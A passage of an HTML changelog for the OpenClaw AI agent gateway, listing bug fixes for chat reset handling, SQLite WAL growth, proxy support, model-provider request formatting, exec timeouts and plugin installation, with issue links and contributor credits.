<li>WebChat: keep bare <code>/new</code> and <code>/reset</code> startup instructions out of visible chat history while preserving <code>/reset &lt;note&gt;</code> as user-visible transcript text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332044131" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72369" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72369/hovercard" href="https://github.com/openclaw/openclaw/issues/72369">#72369</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/collynes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/collynes">@collynes</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haishmg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haishmg">@haishmg</a>.</li>
<li>Tasks/memory: checkpoint and truncate SQLite WAL sidecars on a timer and before close for task, Task Flow, proxy capture, and builtin memory databases, bounding long-running gateway <code>*.sqlite-wal</code> growth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335184021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72774" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72774/hovercard" href="https://github.com/openclaw/openclaw/issues/72774">#72774</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfpalhano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfpalhano">@dfpalhano</a>.</li>
<li>CLI/doctor: remove dangling channel config, heartbeat targets, and channel model overrides when stale plugin repair removes a missing channel plugin, preventing Gateway boot loops after failed plugin reinstalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247552366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65293" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65293/hovercard" href="https://github.com/openclaw/openclaw/issues/65293">#65293</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidecode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidecode">@yidecode</a>.</li>
<li>Control UI/Gateway: cache, coalesce, stale-refresh, and invalidate effective tool inventory on channel registry changes while reusing the gateway-bound plugin registry and avoiding model/auth discovery, so chat runs no longer stall Control UI requests on repeated plugin/model setup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331993898" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72365/hovercard" href="https://github.com/openclaw/openclaw/issues/72365">#72365</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332899080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72558/hovercard" href="https://github.com/openclaw/openclaw/pull/72558">#72558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gabiii2398/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gabiii2398">@Gabiii2398</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Channels/setup: treat bundled channel plugins as already bundled during <code>channels add</code> and onboarding, enabling them without writing redundant <code>plugins.load.paths</code> entries or path install records. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334766601" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72740" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72740/hovercard" href="https://github.com/openclaw/openclaw/issues/72740">#72740</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iCodePoet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iCodePoet">@iCodePoet</a>.</li>
<li>WhatsApp: honor gateway <code>HTTPS_PROXY</code> / <code>HTTP_PROXY</code> env vars for QR-login WebSocket connections, while respecting <code>NO_PROXY</code>, so proxied networks no longer fall back to direct <code>mmg.whatsapp.net</code> connections that time out with 408. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332861530" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72547" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72547/hovercard" href="https://github.com/openclaw/openclaw/issues/72547">#72547</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333995671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72692/hovercard" href="https://github.com/openclaw/openclaw/pull/72692">#72692</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mebusw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mebusw">@mebusw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Bonjour: default mDNS advertisements to the system hostname when it is DNS-safe, avoiding <code>openclaw.local</code> probing conflicts and Gateway restart loops on hosts such as <code>Lobster</code> or <code>ubuntu</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331958353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72355/hovercard" href="https://github.com/openclaw/openclaw/issues/72355">#72355</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333934083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72689" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72689/hovercard" href="https://github.com/openclaw/openclaw/issues/72689">#72689</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334059157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72694" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72694/hovercard" href="https://github.com/openclaw/openclaw/pull/72694">#72694</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mscheuerlein-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mscheuerlein-bot">@mscheuerlein-bot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gcusms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gcusms">@gcusms</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moyuwuhen601/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moyuwuhen601">@moyuwuhen601</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pavan987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pavan987">@pavan987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zml-0912/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zml-0912">@zml-0912</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hhq365/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hhq365">@hhq365</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Agents/OpenAI-compatible: retry replay-safe empty <code>stop</code> turns once for <code>openai-completions</code> endpoints, so transient empty local backend responses no longer surface as “Agent couldn't generate a response” when a continuation succeeds, and restore <code>openclaw agent --model</code> for one-shot CLI runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334894224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72751/hovercard" href="https://github.com/openclaw/openclaw/issues/72751">#72751</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moooV252/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moooV252">@moooV252</a>.</li>
<li>Git hooks: skip ignored staged paths when formatting and restaging pre-commit files, so merge commits no longer abort when <code>.gitignore</code> newly ignores staged merged content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334805845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72744/hovercard" href="https://github.com/openclaw/openclaw/issues/72744">#72744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Memory-core/dreaming: add a supported <code>dreaming.model</code> knob for Dream Diary narrative subagents, wired through phase config and the existing plugin subagent model-override trust gate. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255215946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65963/hovercard" href="https://github.com/openclaw/openclaw/issues/65963">#65963</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/esqandil/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/esqandil">@esqandil</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Agents/Anthropic: remove trailing assistant prefill payloads when extended thinking is enabled, so Opus 4.7/Sonnet 4.6 requests do not fail Anthropic's user-final-turn validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334735494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72739/hovercard" href="https://github.com/openclaw/openclaw/issues/72739">#72739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/superandylin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/superandylin">@superandylin</a>.</li>
<li>Agents/vLLM/Qwen: add plugin-owned Qwen thinking controls for vLLM chat-template kwargs and DashScope-style top-level <code>enable_thinking</code> flags, including preserved thinking for agent loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331705792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72329/hovercard" href="https://github.com/openclaw/openclaw/issues/72329">#72329</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stavrostzagadouris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stavrostzagadouris">@stavrostzagadouris</a>.</li>
<li>Memory-core/dreaming: treat request-scoped narrative fallback as expected, skip session cleanup when no subagent run was created, and remove duplicate phase-level cleanup so fallback no longer emits warning noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268571406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67152" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67152/hovercard" href="https://github.com/openclaw/openclaw/issues/67152">#67152</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Agents/exec: apply configured <code>tools.exec.timeoutSec</code> to background, <code>yieldMs</code>, and node <code>system.run</code> commands when no per-call timeout is set, preventing auto-backgrounded and remote node commands from running indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274573328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67600" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67600/hovercard" href="https://github.com/openclaw/openclaw/issues/67600">#67600</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274648073" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67603" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67603/hovercard" href="https://github.com/openclaw/openclaw/pull/67603">#67603</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlmpx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlmpx">@dlmpx</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>Config/doctor: stop masking unknown-key validation diagnostics such as <code>agents.defaults.llm</code>, and have <code>openclaw doctor --fix</code> remove the retired <code>agents.defaults.llm</code> timeout block. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aidiffuser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aidiffuser">@aidiffuser</a>.</li>
<li>CLI/startup: keep the built pre-dispatch CLI graph free of package-level imports and extend packaged CLI smoke coverage to onboard and doctor help paths, preventing missing runtime dependencies such as tslog from killing onboarding before repair code can run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223102766" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63024" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63024/hovercard" href="https://github.com/openclaw/openclaw/issues/63024">#63024</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hu19940121/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hu19940121">@hu19940121</a>.</li>
<li>CLI/plugins: preserve unversioned ClawHub install specs so <code>plugins update</code> can follow newer ClawHub releases instead of pinning to the initially resolved version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222950605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63010/hovercard" href="https://github.com/openclaw/openclaw/issues/63010">#63010</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4179937057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58426" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58426/hovercard" href="https://github.com/openclaw/openclaw/pull/58426">#58426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kangsen1234/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kangsen1234">@kangsen1234</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robinspt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robinspt">@robinspt</a>.</li>
<li>Memory-core/subagents: tag plugin-created subagent sessions with their plugin owner so dreaming narrative cleanup can delete its own ephemeral sessions without granting broad admin session deletion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334282794" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72712" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72712/hovercard" href="https://github.com/openclaw/openclaw/issues/72712">#72712</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BSG2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BSG2000">@BSG2000</a>.</li>
<li>Gateway/models: move local-provider pricing opt-outs, OpenRouter/LiteLLM aliases, and proxy passthrough pricing lookup into plugin manifest metadata so core no longer carries extension-specific pricing tables.</li>
<li>CLI/update: honor <code>OPENCLAW_NO_AUTO_UPDATE=1</code> as a gateway startup kill-switch for configured background package auto-updates, so operators can hold a deliberate downgrade during incident recovery without editing config first. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334350067" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72715/hovercard" href="https://github.com/openclaw/openclaw/issues/72715">#72715</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xivi08/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xivi08">@Xivi08</a>.</li>
<li>Agents/Claude CLI: force live-session launches to include <code>--output-format stream-json</code> whenever OpenClaw adds <code>--input-format stream-json</code>, so new Claude CLI sessions no longer fail immediately while reusable sessions keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331058930" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72206/hovercard" href="https://github.com/openclaw/openclaw/issues/72206">#72206</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kwangwonkoh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kwangwonkoh">@kwangwonkoh</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xivi08/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xivi08">@Xivi08</a>.</li>
<li>CLI/plugins: accept ClawHub plugin API wildcard ranges such as <code>*</code> without rejecting compatible plugin installs, while still requiring a valid runtime API version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160287580" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56446" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56446/hovercard" href="https://github.com/openclaw/openclaw/issues/56446">#56446</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160379824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56466/hovercard" href="https://github.com/openclaw/openclaw/pull/56466">#56466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/darconada/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/darconada">@darconada</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claygeo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claygeo">@claygeo</a>.</li>
<li>CLI/plugins: add an explicit <code>npm:&lt;package&gt;</code> install prefix that skips ClawHub lookup for known npm packages while keeping bare package specs ClawHub-first. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4152647207" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55805/hovercard" href="https://github.com/openclaw/openclaw/issues/55805">#55805</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133768218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54377" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54377/hovercard" href="https://github.com/openclaw/openclaw/pull/54377">#54377</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zeoy2020/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zeoy2020">@Zeoy2020</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vagusX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vagusX">@vagusX</a>.</li>
<li>CLI/plugins: let config-gated bundled plugins install without persisting invalid placeholder config entries, so install/uninstall sweeps can cover plugins such as memory-lancedb before the user configures credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/plugins: reject malformed ClawHub plugin specs with trailing <code>@</code> before registry lookup, so empty-version typos report as invalid specs instead of package-not-found errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161404128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56579" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56579/hovercard" href="https://github.com/openclaw/openclaw/issues/56579">#56579</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161414890" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56582/hovercard" href="https://github.com/openclaw/openclaw/pull/56582">#56582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kansodata/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kansodata">@Kansodata</a>.</li>
<li>Agents/sessions: acquire the session write lock only after cold bootstrap, plugin, and tool setup so fallback runs are not blocked by stalled pre-model startup work.</li>
<li>Browser/plugins: auto-start the bundled browser plugin when root <code>browser</code> config is present, including restrictive plugin allowlists, and ignore stale persisted plugin registries whose package paths no longer exist.</li>
<li>Browser: circuit-break repeated managed Chrome launch failures per profile so browser requests stop spawning Chromium indefinitely when CDP cannot start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4238688678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64271/hovercard" href="https://github.com/openclaw/openclaw/issues/64271">#64271</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheophilusChinomona/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheophilusChinomona">@TheophilusChinomona</a>.</li>
<li>Gateway/models: skip external OpenRouter and LiteLLM pricing refreshes for local/self-hosted model endpoints so startup does not wait on remote pricing catalogs for local-only Ollama, vLLM, and compatible providers.</li>
<li>CLI/plugins: stop security-blocked plugin installs from retrying as hook packs, so normal plugin packages report the scanner failure without a misleading "not a valid hook pack" follow-up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206381395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61175/hovercard" href="https://github.com/openclaw/openclaw/issues/61175">#61175</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236769831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64102" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64102/hovercard" href="https://github.com/openclaw/openclaw/pull/64102">#64102</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KonsultDigital/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KonsultDigital">@KonsultDigital</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziyincody/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziyincody">@ziyincody</a>.</li>
<li>Agents/Anthropic: strip stale trailing assistant prefill turns from outbound replay so context-engine short circuits cannot send unsupported assistant-prefill payloads to provider APIs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332888910" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72556/hovercard" href="https://github.com/openclaw/openclaw/issues/72556">#72556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Veda-openclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Veda-openclaw">@Veda-openclaw</a>.</li>
<li>Agents/Google: strip stale trailing assistant/model prefill turns from Gemini outbound replay so Google Generative AI requests end with a user turn or function response. Follow-up to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332888910" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72556/hovercard" href="https://github.com/openclaw/openclaw/issues/72556">#72556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Veda-openclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Veda-openclaw">@Veda-openclaw</a>.</li>
<li>Control UI/Dreaming: require explicit confirmation before applying restart-impacting Dreaming mode changes, with restart warning copy and loading feedback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233221234" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63804/hovercard" href="https://github.com/openclaw/openclaw/issues/63804">#63804</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233286540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63807/hovercard" href="https://github.com/openclaw/openclaw/pull/63807">#63807</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bbddbb1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bbddbb1">@bbddbb1</a>.</li>
<li>CLI/agent: mark Gateway-to-embedded fallback runs with <code>meta.transport: "embedded"</code> and <code>meta.fallbackFrom: "gateway"</code> in JSON output, and make the terminal diagnostic explicit so scripts and operators can distinguish fallback runs from Gateway runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327249504" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71416" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71416/hovercard" href="https://github.com/openclaw/openclaw/issues/71416">#71416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/tools: normalize <code>null</code> or missing tool-call arguments to <code>{}</code> for parameterless object schemas before Pi validation, so empty-argument tools run instead of failing argument validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333066551" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72587/hovercard" href="https://github.com/openclaw/openclaw/issues/72587">#72587</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/subagents: clear active embedded-run state before terminal lifecycle events so post-completion cleanup no longer treats finished child runs as still active and skips archive or announcement bookkeeping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309345615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70187" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70187/hovercard" href="https://github.com/openclaw/openclaw/pull/70187">#70187</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/update: keep the automatic post-update completion refresh on the core-command tree so it no longer stages bundled plugin runtime deps before the Gateway restart path, avoiding <code>.24</code> update hangs and 1006 disconnect cascades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333693515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72665/hovercard" href="https://github.com/openclaw/openclaw/issues/72665">#72665</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/He-Pin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/He-Pin">@He-Pin</a>.</li>
